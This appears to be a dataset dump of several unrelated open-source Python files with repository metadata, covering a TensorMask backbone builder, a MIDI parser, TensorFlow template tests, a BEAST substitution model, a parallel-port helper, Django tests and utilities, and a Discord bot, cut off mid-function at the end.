        for name, loader in zip(cfg.DATASETS.TEST, loaders)
    ]
| 28.097938
| 104
| 0.63548
|
794afe494d648a6c55c1ccd2785e3255ed6cc45f
| 716
|
py
|
Python
|
playground/segmentation/coco/tensormask/tensormask.res50.fpn.coco.800size.1x/net.py
|
reinforcementdriving/cvpods
|
32d98b74745020be035a0e20337ad934201615c4
|
[
"Apache-2.0"
] | 1
|
2021-04-24T17:01:29.000Z
|
2021-04-24T17:01:29.000Z
|
playground/segmentation/coco/tensormask/tensormask.res50.fpn.coco.800size.1x/net.py
|
wondervictor/cvpods
|
614a975e5425bbaeb66bbd1ffca552d633ba89ca
|
[
"Apache-2.0"
] | null | null | null |
playground/segmentation/coco/tensormask/tensormask.res50.fpn.coco.800size.1x/net.py
|
wondervictor/cvpods
|
614a975e5425bbaeb66bbd1ffca552d633ba89ca
|
[
"Apache-2.0"
] | null | null | null |
from cvpods.layers import ShapeSpec
from cvpods.modeling.meta_arch import TensorMask
from cvpods.modeling.backbone import Backbone
from cvpods.modeling.backbone.fpn import build_retinanet_resnet_fpn_backbone
def build_backbone(cfg, input_shape=None):
    """
    Build a backbone from `cfg.MODEL.BACKBONE.NAME`.

    When *input_shape* is omitted, it is derived from the number of
    configured pixel-mean channels.

    Returns:
        an instance of :class:`Backbone`
    """
    shape = (
        ShapeSpec(channels=len(cfg.MODEL.PIXEL_MEAN))
        if input_shape is None
        else input_shape
    )
    net = build_retinanet_resnet_fpn_backbone(cfg, shape)
    assert isinstance(net, Backbone)
    return net
def build_model(cfg):
    """Create a TensorMask meta-architecture wired to this module's backbone factory."""
    cfg.build_backbone = build_backbone
    return TensorMask(cfg)
| 25.571429
| 76
| 0.75
|
794afe84ebbcdfbc5c1fcc7d863e2b103a1eab7c
| 6,644
|
py
|
Python
|
src/midi/MidiFileParser.py
|
Adilmar/DancePython
|
846a4abc9ef1969da2e84e985b834abcf5db03c0
|
[
"BSD-3-Clause"
] | null | null | null |
src/midi/MidiFileParser.py
|
Adilmar/DancePython
|
846a4abc9ef1969da2e84e985b834abcf5db03c0
|
[
"BSD-3-Clause"
] | null | null | null |
src/midi/MidiFileParser.py
|
Adilmar/DancePython
|
846a4abc9ef1969da2e84e985b834abcf5db03c0
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: ISO-8859-1 -*-
# std library
from struct import unpack
# uhh I don't really like this, but there are so many constants to
# import otherwise
from constants import *
from EventDispatcher import EventDispatcher
class MidiFileParser:
    """
    The MidiFileParser is the lowest level parser that see the data as
    midi data. It generates events that gets triggered on the outstream.
    """

    def __init__(self, raw_in, outstream):
        """
        raw_in is a RawInstreamFile wrapping the raw content of a midi file;
        outstream receives the generated events via an EventDispatcher.
        """
        # internal values, don't mess with 'em directly
        self.raw_in = raw_in
        self.dispatch = EventDispatcher(outstream)
        # Used to keep track of stuff
        self._running_status = None

    def parseMThdChunk(self):
        "Parses the header chunk"
        raw_in = self.raw_in
        header_chunk_type = raw_in.nextSlice(4)
        header_chunk_zise = raw_in.readBew(4)  # (sic) original misspelling of 'size' retained
        # check if it is a proper midi file
        if header_chunk_type != 'MThd':
            raise TypeError, "It is not a valid midi file!"
        # Header values are at fixed locations, so no reason to be clever
        self.format = raw_in.readBew(2)
        self.nTracks = raw_in.readBew(2)
        self.division = raw_in.readBew(2)
        # Theoretically a header larger than 6 bytes can exist
        # but no one has seen one in the wild
        # But correctly ignore unknown data if it is though
        if header_chunk_zise > 6:
            raw_in.moveCursor(header_chunk_zise-6)
        # call the header event handler on the stream
        self.dispatch.header(self.format, self.nTracks, self.division)

    def parseMTrkChunk(self):
        "Parses a track chunk. This is the most important part of the parser."
        # set time to 0 at start of a track
        self.dispatch.reset_time()
        dispatch = self.dispatch
        raw_in = self.raw_in
        # Trigger event at the start of a track
        dispatch.start_of_track(self._current_track)
        # position cursor after track header
        raw_in.moveCursor(4)
        # unsigned long is 4 bytes
        tracklength = raw_in.readBew(4)
        track_endposition = raw_in.getCursor() + tracklength # absolute position!
        while raw_in.getCursor() < track_endposition:
            # find relative time of the event
            time = raw_in.readVarLen()
            dispatch.update_time(time)
            # be aware of running status!!!!
            peak_ahead = raw_in.readBew(move_cursor=0)
            if (peak_ahead & 0x80):
                # the status byte has the high bit set, so it
                # was not running data but proper status byte
                status = raw_in.readBew()
                # meta and sysex events do not update the running status
                if not peak_ahead in [META_EVENT, SYSTEM_EXCLUSIVE]:
                    self._running_status = status
            else:
                # use that darn running status
                status = self._running_status
                # could it be illegal data ?? Do we need to test for that?
                # I need more example midi files to be shure.
                # Also, while I am almost certain that no realtime
                # messages will pop up in a midi file, I might need to
                # change my mind later.
            # we need to look at nibbles here
            hi_nible, lo_nible = status & 0xF0, status & 0x0F
            # match up with events
            # Is it a meta_event ??
            # these only exists in midi files, not in transmitted midi data
            # In transmitted data META_EVENT (0xFF) is a system reset
            if status == META_EVENT:
                meta_type = raw_in.readBew()
                meta_length = raw_in.readVarLen()
                meta_data = raw_in.nextSlice(meta_length)
                # zero-length meta data aborts the track parse early
                if not meta_length: return
                dispatch.meta_event(meta_type, meta_data)
                if meta_type == END_OF_TRACK: return
            # Is it a sysex_event ??
            elif status == SYSTEM_EXCLUSIVE:
                # ignore sysex events
                sysex_length = raw_in.readVarLen()
                # don't read sysex terminator
                sysex_data = raw_in.nextSlice(sysex_length-1)
                # only read last data byte if it is a sysex terminator
                # It should allways be there, but better safe than sorry
                if raw_in.readBew(move_cursor=0) == END_OFF_EXCLUSIVE:
                    eo_sysex = raw_in.readBew()
                dispatch.sysex_event(sysex_data)
                # the sysex code has not been properly tested, and might be fishy!
            # is it a system common event?
            elif hi_nible == 0xF0: # Hi bits are set then
                data_sizes = {
                    MTC:1,
                    SONG_POSITION_POINTER:2,
                    SONG_SELECT:1,
                }
                data_size = data_sizes.get(hi_nible, 0)
                common_data = raw_in.nextSlice(data_size)
                common_type = lo_nible
                dispatch.system_common(common_type, common_data)
            # Oh! Then it must be a midi event (channel voice message)
            else:
                data_sizes = {
                    PATCH_CHANGE:1,
                    CHANNEL_PRESSURE:1,
                    NOTE_OFF:2,
                    NOTE_ON:2,
                    AFTERTOUCH:2,
                    CONTINUOUS_CONTROLLER:2,
                    PITCH_BEND:2,
                }
                data_size = data_sizes.get(hi_nible, 0)
                channel_data = raw_in.nextSlice(data_size)
                event_type, channel = hi_nible, lo_nible
                dispatch.channel_messages(event_type, channel, channel_data)

    def parseMTrkChunks(self):
        "Parses all track chunks."
        for t in range(self.nTracks):
            self._current_track = t
            self.parseMTrkChunk() # this is where it's at!
        self.dispatch.eof()
if __name__ == '__main__':
    # Ad-hoc smoke test: parse the midi file named on the command line and
    # print its events as text via MidiToText.
    import sys
    # get data
    test_file = 'test/midifiles/minimal.mid'
    test_file = 'test/midifiles/cubase-minimal.mid'
    test_file = 'test/midifiles/Lola.mid'
    test_file = sys.argv[1]  # the rebindings above are leftovers; argv wins
    # f = open(test_file, 'rb')
    # raw_data = f.read()
    # f.close()
    #
    #
    # # do parsing
    from MidiToText import MidiToText
    from RawInstreamFile import RawInstreamFile
    midi_in = MidiFileParser(RawInstreamFile(test_file), MidiToText())
    midi_in.parseMThdChunk()
    midi_in.parseMTrkChunks()
| 82
| 0.573299
|
794affc090c98441b5096c9e3a8adadef160e581
| 74
|
py
|
Python
|
ner_anonymizer/__init__.py
|
kelvnt/DataAnonymizer
|
0d81972b4e4521a4db746ddd8788bf98087a48d2
|
[
"MIT"
] | 2
|
2020-09-07T13:34:30.000Z
|
2020-09-07T13:35:52.000Z
|
ner_anonymizer/__init__.py
|
kelvnt/DataAnonymizer
|
0d81972b4e4521a4db746ddd8788bf98087a48d2
|
[
"MIT"
] | 1
|
2021-06-30T06:27:34.000Z
|
2021-06-30T08:24:25.000Z
|
ner_anonymizer/__init__.py
|
kelvnt/ner-anonymizer
|
de8df3186cbae5efc316887f40f12e14e0d0e298
|
[
"MIT"
] | null | null | null |
from .ner_anonymizer import (
DataAnonymizer,
de_anonymize_data
)
| 14.8
| 29
| 0.743243
|
794b012749a8a7eb9768b6bd7e210d9249de03ea
| 6,997
|
py
|
Python
|
tensorflow/python/kernel_tests/template_test.py
|
matsuyama/tensorflow
|
a27d844e05447e65aa279ae5269a2d75590f46f6
|
[
"Apache-2.0"
] | 23
|
2016-02-04T21:08:43.000Z
|
2022-01-14T13:22:33.000Z
|
tensorflow/python/kernel_tests/template_test.py
|
matsuyama/tensorflow
|
a27d844e05447e65aa279ae5269a2d75590f46f6
|
[
"Apache-2.0"
] | 2
|
2016-05-31T16:38:55.000Z
|
2018-12-30T20:17:05.000Z
|
tensorflow/python/kernel_tests/template_test.py
|
matsuyama/tensorflow
|
a27d844e05447e65aa279ae5269a2d75590f46f6
|
[
"Apache-2.0"
] | 20
|
2016-02-15T17:31:02.000Z
|
2020-01-12T08:18:48.000Z
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for make_template."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import traceback
import tensorflow.python.platform
import tensorflow as tf
from tensorflow.python.ops import template
def var_scoped_function():
  """Fetch-or-create a length-1 variable named 'dummy', zero-initialized."""
  return tf.get_variable(
      "dummy", shape=[1], initializer=tf.zeros_initializer)
def internally_var_scoped_function(scope_name):
  """Like var_scoped_function, but nests the variable under *scope_name*."""
  with tf.variable_scope(scope_name):
    dummy = tf.get_variable(
        "dummy", shape=[1], initializer=tf.zeros_initializer)
  return dummy
def function_with_create(trainable):
  """Creates a variable as a side effect using tf.Variable."""
  # Created outside get_variable on purpose — the tests below rely on the
  # template machinery noticing variables made behind its back.
  tf.Variable(0, trainable=trainable)
  return tf.get_variable(
      "dummy", shape=[1], initializer=tf.zeros_initializer)
class TemplateTest(tf.test.TestCase):
  """Tests for make_template's variable sharing and naming semantics."""

  def test_end_to_end(self):
    """This test shows a very simple line model with test_loss.

    The template is used to share parameters between a training and test model.
    """
    # y = 2x + 1
    training_input, training_output = ([1., 2., 3., 4.], [2.8, 5.1, 7.2, 8.7])
    test_input, test_output = ([5., 6., 7., 8.], [11, 13, 15, 17])
    tf.set_random_seed(1234)

    def test_line(x):
      m = tf.get_variable("w", shape=[],
                          initializer=tf.truncated_normal_initializer())
      b = tf.get_variable("b", shape=[],
                          initializer=tf.truncated_normal_initializer())
      return x * m + b

    line_template = template.make_template("line", test_line)

    # Both calls reuse the same w and b variables.
    train_prediction = line_template(training_input)
    test_prediction = line_template(test_input)

    train_loss = tf.reduce_mean(tf.square(train_prediction - training_output))
    test_loss = tf.reduce_mean(tf.square(test_prediction - test_output))

    optimizer = tf.train.GradientDescentOptimizer(0.1)
    train_op = optimizer.minimize(train_loss)

    with tf.Session() as sess:
      sess.run(tf.initialize_all_variables())
      initial_test_loss = sess.run(test_loss)
      sess.run(train_op)
      final_test_loss = sess.run(test_loss)

    # Parameters are tied, so the loss should have gone down when we trained it.
    self.assertLess(final_test_loss, initial_test_loss)

  def test_skip_stack_frames(self):
    first = traceback.format_stack()
    second = traceback.format_stack()
    result = template._skip_common_stack_elements(first, second)
    self.assertEqual(1, len(result))
    self.assertNotEqual(len(first), len(result))

  def test_template_with_name(self):
    tmpl1 = template.make_template("s1", var_scoped_function)
    tmpl2 = template.make_template("s1", var_scoped_function)

    v1 = tmpl1()
    v2 = tmpl1()
    v3 = tmpl2()
    # Calls to the same template share variables; a second template with the
    # same requested name gets a uniquified scope instead.
    self.assertEqual(v1, v2)
    self.assertNotEqual(v1, v3)
    self.assertEqual("s1/dummy:0", v1.name)
    self.assertEqual("s1_2/dummy:0", v3.name)

  def test_template_in_scope(self):
    tmpl1 = template.make_template("s1", var_scoped_function)
    tmpl2 = template.make_template("s1", var_scoped_function)

    with tf.variable_scope("scope"):
      v1 = tmpl1()
      v3 = tmpl2()

    # The template contract requires the following to ignore scope2.
    with tf.variable_scope("scope2"):
      v2 = tmpl1()
    self.assertEqual(v1, v2)
    self.assertNotEqual(v1, v3)
    self.assertEqual("scope/s1/dummy:0", v1.name)
    self.assertEqual("scope/s1_1/dummy:0", v3.name)

  def test_template_with_internal_reuse(self):
    tmpl1 = template.make_template("s1", internally_var_scoped_function)
    tmpl2 = template.make_template("s1", internally_var_scoped_function)

    v1 = tmpl1("test")
    v2 = tmpl1("test")
    v3 = tmpl2("test")
    self.assertEqual(v1, v2)
    self.assertNotEqual(v1, v3)
    self.assertEqual("s1/test/dummy:0", v1.name)
    self.assertEqual("s1_2/test/dummy:0", v3.name)

    # Calling with a different inner scope name must fail — the template
    # would otherwise create a second, unshared variable.
    with self.assertRaises(ValueError):
      tmpl1("not_test")

  def test_template_without_name(self):
    with self.assertRaises(ValueError):
      template.make_template(None, var_scoped_function)

  def test_make_template(self):
    # Test both that we can call it with positional and keywords.
    tmpl1 = template.make_template(
        "s1", internally_var_scoped_function, scope_name="test")
    tmpl2 = template.make_template(
        "s1", internally_var_scoped_function, scope_name="test")

    v1 = tmpl1()
    v2 = tmpl1()
    v3 = tmpl2()
    self.assertEqual(v1, v2)
    self.assertNotEqual(v1, v3)
    self.assertEqual("s1/test/dummy:0", v1.name)
    self.assertEqual("s1_2/test/dummy:0", v3.name)

  def test_enforces_no_extra_trainable_variables(self):
    tmpl = template.make_template("s", function_with_create, trainable=True)

    tmpl()
    # A second call creating another trainable variable breaks the contract.
    with self.assertRaises(ValueError):
      tmpl()

  def test_permits_extra_non_trainable_variables(self):
    tmpl = template.make_template("s", function_with_create, trainable=False)
    self.assertEqual(tmpl(), tmpl())

  def test_internal_variable_reuse(self):
    def nested():
      with tf.variable_scope("nested") as vs:
        v1 = tf.get_variable("x", initializer=tf.zeros_initializer, shape=[])
      with tf.variable_scope(vs, reuse=True):
        v2 = tf.get_variable("x")
      self.assertEqual(v1, v2)
      return v1

    tmpl1 = template.make_template("s1", nested)
    tmpl2 = template.make_template("s1", nested)

    v1 = tmpl1()
    v2 = tmpl1()
    v3 = tmpl2()
    self.assertEqual(v1, v2)
    self.assertNotEqual(v1, v3)
    self.assertEqual("s1/nested/x:0", v1.name)
    self.assertEqual("s1_2/nested/x:0", v3.name)

  def test_nested_templates(self):
    def nested_template():
      nested1 = template.make_template("nested", var_scoped_function)
      nested2 = template.make_template("nested", var_scoped_function)
      v1 = nested1()
      v2 = nested2()
      self.assertNotEqual(v1, v2)
      return v2

    tmpl1 = template.make_template("s1", nested_template)
    tmpl2 = template.make_template("s1", nested_template)

    v1 = tmpl1()
    v2 = tmpl1()
    v3 = tmpl2()
    self.assertEqual(v1, v2)
    self.assertNotEqual(v1, v3)
    self.assertEqual("s1/nested_1/dummy:0", v1.name)
    self.assertEqual("s1_2/nested_1/dummy:0", v3.name)
if __name__ == "__main__":
  # Run all test cases in this module under the TensorFlow test runner.
  tf.test.main()
| 32.696262
| 80
| 0.677719
|
794b019e71623e77a66a2bf0253968dc7aa0dabc
| 2,452
|
py
|
Python
|
beastling/models/binaryctmc.py
|
tresoldi/BEASTling
|
9deaf8a18bfd5516169a124ac439d3bfa0eab506
|
[
"BSD-2-Clause"
] | 12
|
2015-10-30T09:25:09.000Z
|
2021-12-09T17:06:50.000Z
|
beastling/models/binaryctmc.py
|
tresoldi/BEASTling
|
9deaf8a18bfd5516169a124ac439d3bfa0eab506
|
[
"BSD-2-Clause"
] | 254
|
2015-11-03T10:37:05.000Z
|
2021-07-23T19:57:35.000Z
|
beastling/models/binaryctmc.py
|
tresoldi/BEASTling
|
9deaf8a18bfd5516169a124ac439d3bfa0eab506
|
[
"BSD-2-Clause"
] | 9
|
2015-11-02T09:57:31.000Z
|
2021-05-12T00:48:03.000Z
|
from .binary import BinaryModelWithShareParams as BinaryModel
from beastling.util import xml
class BinaryCTMCModel(BinaryModel):
    """Binary-trait model that emits a two-state general CTMC substitution model.

    Extends BinaryModel to write a BEAST GeneralSubstitutionModel XML element,
    optionally shared across all features, with estimated, empirical, or
    uniform state frequencies depending on the model configuration.
    """

    def __init__(self, model_config, global_config):
        BinaryModel.__init__(self, model_config, global_config)
        # XML id of the shared substmodel; set on first creation when
        # parameters are shared across features.
        self.subst_model_id = None

    def get_userdatatype(self, feature, fname):
        # Emit the Binary datatype element once per BEAST file, then refer to
        # it by idref on every subsequent call.
        if not self.beastxml._binary_userdatatype_created:
            self.beastxml._binary_userdatatype_created = True
            return xml.userDataType(None, id="BinaryDatatype", spec="beast.evolution.datatype.Binary")
        return xml.userDataType(None, idref="BinaryDatatype")

    def add_substmodel(self, sitemodel, feature, fname):
        """Attach a two-state CTMC substModel element to *sitemodel*."""
        # If we're sharing one substmodel across all features and have already
        # created it, just reference it and that's it
        if self.subst_model_id:
            sitemodel.set("substModel", "@%s" % self.subst_model_id)
            return

        # Otherwise, create a substmodel
        name = self.name if self.share_params else fname
        subst_model_id = "binaryCTMC.s:%s" % name
        if self.share_params:
            self.subst_model_id = subst_model_id
        substmodel = xml.substModel(sitemodel, id=subst_model_id, spec="GeneralSubstitutionModel")
        # Fixed, symmetric transition rates for the two states.
        xml.parameter(
            substmodel,
            text="1.0 1.0",
            id="rates.s:%s" % name,
            dimension=2,
            estimate="false",
            name="rates")

        if self.frequencies == "estimate":
            xml.frequencies(
                substmodel,
                id="estimatedFrequencies.s:%s" % name,
                spec="Frequencies",
                frequencies="@freqs_param.s:%s" % name)
        elif self.frequencies == "empirical":
            # Empirical frequencies come either from the (filtered) alignment
            # or from a precomputed frequency string, depending on sharing.
            attribs = {"id": "empiricalFrequencies.s:%s" % name, "spec": "Frequencies"}
            if self.share_params:
                if self.single_sitemodel:
                    attribs["data"] = "@filtered_data_%s" % name
                else:
                    attribs["frequencies"] = self.build_freq_str()
            else:
                attribs["data"] = "@feature_data_%s" % name
            xml.frequencies(substmodel, attrib=attribs)
        elif self.frequencies == "uniform":
            xml.frequencies(
                substmodel,
                text="0.5 0.5",
                id="frequencies.s:%s" % name,
                dimension="2",
                spec="parameter.RealParameter")
|
794b01c5a93ca8c5fa2e3f04f835820d4d8d2fdf
| 4,005
|
py
|
Python
|
29dec/HaIndusIOcard.py
|
sethiyark/be-project
|
e74f3aae0caa8d4796cb47cdc51547b77d3cb1f1
|
[
"MIT"
] | null | null | null |
29dec/HaIndusIOcard.py
|
sethiyark/be-project
|
e74f3aae0caa8d4796cb47cdc51547b77d3cb1f1
|
[
"MIT"
] | null | null | null |
29dec/HaIndusIOcard.py
|
sethiyark/be-project
|
e74f3aae0caa8d4796cb47cdc51547b77d3cb1f1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# File pportbits.py
# http://www.bristolwatch.com/pport/index.htm
# By Lewis Loflin - lewis@bvu.net
# Example code to turn ON-OFF individual bits on PC
# printer port Db25 pins 2-9.
# Must use my version of pyparallel on website for self.p.getData().
# Bitwise AND is used to clear a bit while bitwise OR used to set bit.
import parallel
import time
class Parallel_ports:
    """Thin wrapper around a pyparallel port exposing per-DB25-pin helpers.

    Data pins 2-9 map to data-register bits 0-7 and are driven through
    setData/getData. A few control pins (1, 14, 16, 17) have dedicated
    pyparallel setters, and status pins (10-13, 15) are read-only.
    """

    # Control pins with dedicated pyparallel setters: pin -> method name.
    _CONTROL_SETTERS = {
        1: "setDataStrobe",
        14: "setAutoFeed",
        16: "setInitOut",
        17: "setSelect",
    }

    # Read-only status pins: pin -> pyparallel getter name.
    _STATUS_GETTERS = {
        10: "getInAcknowledge",
        11: "getInBusy",
        12: "getInPaperOut",
        13: "getInSelected",
        15: "getInError",
    }

    def __init__(self):
        self.p = parallel.Parallel()

    def clearPin(self, bit_val):
        """Drive output pin *bit_val* low; unknown pins are ignored."""
        if 2 <= bit_val <= 9:
            mask = 1 << (bit_val - 2)  # pin N maps to data bit N-2
            self.p.setData(self.p.getData() & (255 - mask))
        elif bit_val in self._CONTROL_SETTERS:
            getattr(self.p, self._CONTROL_SETTERS[bit_val])(0)

    def setPin(self, bit_val):
        """Drive output pin *bit_val* high; unknown pins are ignored."""
        if 2 <= bit_val <= 9:
            mask = 1 << (bit_val - 2)  # pin N maps to data bit N-2
            self.p.setData(self.p.getData() | mask)
        elif bit_val in self._CONTROL_SETTERS:
            getattr(self.p, self._CONTROL_SETTERS[bit_val])(1)

    def getPin(self, bit_val):
        """Read status pin *bit_val*; returns None for unknown pins."""
        getter = self._STATUS_GETTERS.get(bit_val)
        if getter is not None:
            return getattr(self.p, getter)()
'''
# convert a 8-bit number (integer) to a binary.
# Returns string.
# unlike python bin() this doesn't drop leading zeros
def convBinary(value):
binaryValue = 'b'
for x in range(0, 8):
temp = value & 0x80
if temp == 0x80:
binaryValue = binaryValue + '1'
else:
binaryValue = binaryValue + '0'
value = value << 1
return binaryValue
# Set all data port bits to 0
self.p.setData(0) # LEDs off
print "Port data latches =", self.p.getData()
# read port data latches - should be 0
# use differing combinations
# set bits D0, D1, D2, D3
#__________________________________MAIN_CODE___________________________
for x in range (0,10):
print "Pin value =", getPin(12)
time.sleep(0.5)
# Read and print data port:
xp = self.p.getData()
print "Value of data port =", convBinary(xp), " ", hex(xp)
xp = self.p.PPRSTATUS()
print "Value of control port =", convBinary(xp), " ", hex(xp)
# should be Value of control port = b10000011 0x83
# LEDs connected to port will show 10000011
'''
| 32.298387
| 76
| 0.588514
|
794b03274bbe5f0ad9cd422a9daa76dc00692286
| 1,388
|
py
|
Python
|
bespin/test_backend.py
|
Duke-GCB/bespin-api
|
cea5c20fb2ff592adabe6ebb7ca934939aa11a34
|
[
"MIT"
] | null | null | null |
bespin/test_backend.py
|
Duke-GCB/bespin-api
|
cea5c20fb2ff592adabe6ebb7ca934939aa11a34
|
[
"MIT"
] | 137
|
2016-12-09T18:59:45.000Z
|
2021-06-10T18:55:47.000Z
|
bespin/test_backend.py
|
Duke-GCB/bespin-api
|
cea5c20fb2ff592adabe6ebb7ca934939aa11a34
|
[
"MIT"
] | 3
|
2017-11-14T16:05:58.000Z
|
2018-12-28T18:07:43.000Z
|
from django.test.utils import override_settings
from django.test import TestCase
from unittest.mock import patch
from bespin.backend import BespinOAuth2Backend
class BespinOAuth2BackendTestCase(TestCase):
def setUp(self):
self.details = {'dukeUniqueID': 'abc123'}
@override_settings(REQUIRED_GROUP_MANAGER_GROUP='test-group')
@patch('bespin.backend.BespinOAuth2Backend.verify_user_belongs_to_group')
def test_check_user_details_verifies_required_group(self, mock_verify):
backend = BespinOAuth2Backend()
backend.check_user_details(self.details)
self.assertTrue(mock_verify.called)
self.assertTrue(mock_verify.call_args('abc123','test-group'))
@override_settings(REQUIRED_GROUP_MANAGER_GROUP=None)
@patch('bespin.backend.BespinOAuth2Backend.verify_user_belongs_to_group')
def test_check_user_details_skips_none_group(self, mock_verify):
backend = BespinOAuth2Backend()
backend.check_user_details(self.details)
self.assertFalse(mock_verify.called)
@override_settings(REQUIRED_GROUP_MANAGER_GROUP='')
@patch('bespin.backend.BespinOAuth2Backend.verify_user_belongs_to_group')
def test_check_user_details_skips_emptystring_group(self, mock_verify):
backend = BespinOAuth2Backend()
backend.check_user_details(self.details)
self.assertFalse(mock_verify.called)
| 42.060606
| 77
| 0.778818
|
794b04630f0a967a036d1a62029bdbcb1da914b3
| 1,216
|
py
|
Python
|
model-optimizer/extensions/front/mxnet/softmax_ext.py
|
undeadinu/dldt
|
fbc7a4a710c24def8ab199926a7da90a0394b87d
|
[
"Apache-2.0"
] | 1
|
2019-03-22T06:35:55.000Z
|
2019-03-22T06:35:55.000Z
|
model-optimizer/extensions/front/mxnet/softmax_ext.py
|
undeadinu/dldt
|
fbc7a4a710c24def8ab199926a7da90a0394b87d
|
[
"Apache-2.0"
] | null | null | null |
model-optimizer/extensions/front/mxnet/softmax_ext.py
|
undeadinu/dldt
|
fbc7a4a710c24def8ab199926a7da90a0394b87d
|
[
"Apache-2.0"
] | 1
|
2019-06-11T06:20:42.000Z
|
2019-06-11T06:20:42.000Z
|
"""
Copyright (c) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mo.front.mxnet.extractors.utils import get_mxnet_layer_attrs
from mo.front.extractor import FrontExtractorOp
from mo.ops.softmax import Softmax
class SoftmaxFrontExtractor(FrontExtractorOp):
op = 'softmax'
enabled = True
@staticmethod
def extract(node):
attrs = get_mxnet_layer_attrs(node.symbol_dict)
update_attrs = {
'type': 'Softmax',
'axis': attrs.int("axis", -1),
'temperature': attrs.float('temperature', 1.0)
}
# update the attributes of the node
Softmax.update_node_stat(node, update_attrs)
return __class__.enabled
| 31.179487
| 73
| 0.712993
|
794b050a2422a685fa8f209a28414b6b11a20d05
| 2,052
|
py
|
Python
|
keyed_urls/__init__.py
|
matthiask/django-keyed-urls
|
b195ffd24c1c259485744cc0c1b824f4dd867ac0
|
[
"BSD-3-Clause"
] | null | null | null |
keyed_urls/__init__.py
|
matthiask/django-keyed-urls
|
b195ffd24c1c259485744cc0c1b824f4dd867ac0
|
[
"BSD-3-Clause"
] | null | null | null |
keyed_urls/__init__.py
|
matthiask/django-keyed-urls
|
b195ffd24c1c259485744cc0c1b824f4dd867ac0
|
[
"BSD-3-Clause"
] | null | null | null |
VERSION = (0, 4, 1)
__version__ = '.'.join(map(str, VERSION))
_none_type = 0xc0ffee
_available_languages = None
class KeyDoesNotExist(Exception):
pass
def get_url(key, language=None, fail_silently=False):
global _available_languages
from django.conf import settings
from django.core.cache import cache
from django.utils.translation import get_language, override
from keyed_urls.models import KeyedURL
if _available_languages is None:
_available_languages = [row[0] for row in settings.LANGUAGES]
language = language if language is not None else get_language()
# Django 1.6 comes with trans_real.get_supported_language_variant;
# earlier versions do not. We are being fast and cheap here.
if language not in _available_languages:
language = language.split('-')[0]
cache_key = 'keyed_urls:%s:%s' % (key, language)
url = cache.get(cache_key)
if url is None:
try:
instance = KeyedURL.objects.get(key=key)
except KeyedURL.DoesNotExist:
# We can be smart here and initialize the cache for all
# languages.
cache.set_many(dict((
'keyed_urls:%s:%s' % (key, language),
_none_type,
) for language, _ in settings.LANGUAGES
))
url = None
else:
with override(language=language):
url = instance.url
cache.set(cache_key, _none_type if url is None else url, 120)
if url == _none_type:
url = None
if url is None and not fail_silently:
raise KeyDoesNotExist('No match found for key "%s".' % key)
return None if url == _none_type else url
def get_forwarding_url(key, language=None):
from django.core.urlresolvers import reverse
from django.utils.translation import override
if language is None:
return reverse('keyed_url_forward', kwargs={'key': key})
with override(language):
return reverse('keyed_url_forward', kwargs={'key': key})
| 28.901408
| 73
| 0.64961
|
794b052cd2fb4177cfdce8ce966300d6e262c4d0
| 1,808
|
py
|
Python
|
main.py
|
NCPlayz/EnterShikariBot
|
8a3a958c821bff175eaaf7194d39c8efd2f9da7a
|
[
"MIT"
] | null | null | null |
main.py
|
NCPlayz/EnterShikariBot
|
8a3a958c821bff175eaaf7194d39c8efd2f9da7a
|
[
"MIT"
] | null | null | null |
main.py
|
NCPlayz/EnterShikariBot
|
8a3a958c821bff175eaaf7194d39c8efd2f9da7a
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from discord.ext import commands
import discord
import os
import asyncio
class Bot(commands.Bot):
"""This is the class that initializes the bot."""
def __init__(self):
self.presence = discord.Game(name='The Spark | -help'
, url="https://www.twitch.tv/twitchpresents", type=1)
def get_prefix():
"""Fetches all known prefixes."""
return ["TS ",
"-"]
def get_game():
"""Fetches game presence."""
return self.presence
super().__init__(command_prefix=get_prefix(), game=get_game(), description="The Spark", pm_help=None,
help_attrs=dict(hidden=True))
startup_extensions = [x.stem for x in Path('cogs').glob('*.py')]
for extension in startup_extensions:
try:
self.load_extension(f'cogs.{extension}')
except Exception as e:
error = f'{extension}\n {type(e).__name__}: {e}'
print(f'Failed to load extension {error}')
def run(self, *args, **kwargs):
token = os.environ['TOKEN']
try:
self.loop.run_until_complete(super().start(token, *args, **kwargs))
except KeyboardInterrupt:
self.loop.run_until_complete(self.logout())
pending = asyncio.Task.all_tasks(loop=self.loop)
gathered = asyncio.gather(*pending, loop=self.loop)
try:
gathered.cancel()
self.loop.run_until_complete(gathered)
gathered.exception()
except:
pass
finally:
self.loop.close()
if __name__ == '__main__':
Bot().run()
| 33.481481
| 110
| 0.534845
|
794b055c33f0f4eaba2651d6b28baee4f0cec43f
| 620
|
py
|
Python
|
ginrex/ui/plot_exafs.py
|
San-WierPa/ginRex
|
25af3356e22af033f30b0a8a73139635466e4f44
|
[
"MIT"
] | 2
|
2021-11-22T22:00:05.000Z
|
2021-12-09T18:57:48.000Z
|
ginrex/ui/plot_exafs.py
|
San-WierPa/ginrex
|
25af3356e22af033f30b0a8a73139635466e4f44
|
[
"MIT"
] | null | null | null |
ginrex/ui/plot_exafs.py
|
San-WierPa/ginrex
|
25af3356e22af033f30b0a8a73139635466e4f44
|
[
"MIT"
] | null | null | null |
"""
The :mod:`~ginrex.plot_exafs` module gives the following utility functions:
* - :func:`absorption`
- Returns Matplotlib.pyplot figure.
"""
import matplotlib.pyplot as plt
import numpy as np
from numpy import log
def absorption(filename):
"""
Calculates the absorption according to PetraIII columns I1 and I0
and plots a simple figure.
Parameters
----------
filename: String
Returns
-------
Matplotlib.pyplot figure
"""
datatxt = np.genfromtxt(filename)
